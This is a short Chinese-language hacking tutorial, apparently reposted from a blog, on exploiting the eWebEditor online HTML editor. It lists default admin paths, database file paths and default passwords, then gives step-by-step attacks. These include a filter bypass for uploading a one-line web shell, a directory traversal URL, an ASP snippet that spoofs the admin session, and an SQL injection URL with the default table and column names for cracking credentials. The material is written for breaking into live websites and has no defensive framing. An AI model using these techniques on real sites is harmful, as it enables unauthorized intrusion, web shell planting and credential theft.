编辑器漏洞

网上常用的编辑器有ewebeditor,FCK,DotNetTextBox等,这里只介绍几个常用的。

Ewebeditor:基于浏览器的,所见即所得的在线HTML编辑器

默认后台:ewebeditor/admin_login.asp

默认数据库:ewebeditor/db/ewebeditor.mdb;

      ewebeditor/db/ewebeditor.asa

      ewebeditor/db/ewebeditor.asp

      ewebeditor/db/#ewebeditor.mdb

      ewebeditor/db/#ewebeditor.asa

      ewebeditor/db/!@#ewebeditor.asp

      ewebeditor/db/ewebeditor1033.mdb

默认账号密码:admin admin/admin888/admin999/admin1/admin000

找到后台后,我们可以先用默认账号密码尝试登陆,如果没有进去,那么我们可以去下载数据库文件,然后去查找管理员的账号密码

1)getshell:

登陆后台,点开样式管理,随意找一个样式打开,在图片类型中添加aaspsp(因为编辑器会过滤asp后缀),接下来就是我们熟悉的上传一句话木马了。

2)遍历目录漏洞:2.8.0存在该漏洞

上传文件管理处,有一个样式目录:

http://xxx.xxx.com/ewebeditor/admin_uploadfile.asp?id=14&dir=.. /..  在id=14后添加绿色部分

然后你就可以看到整个的网站文件了

3)利用webEbeditor session欺骗进入后台

漏洞文件:Aadmin_Private.asp

新建一个amxking.asp文件,内容如下:

<%Session("eWebEditor_User") = "11111111"%>
 

访问该文件,在去访问后台任意文件,就都可以看到了。

#  4)2.7.0注入漏洞

http://www.0dayhack.com/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200
默认表名:eWebEditor_System默认列名:sys_UserName、sys_UserPass,然后利用穿山甲进行猜解,对此进行注入取得账号密码。

FCKeditor编辑器:

这个编辑器的漏洞下面这个博客讲的很细致,我就不再多做废话了:

https://blog.csdn.net/lizhengnanhua/article/details/38451737

原文地址:https://www.cnblogs.com/xiaoqiyue/p/10144318.html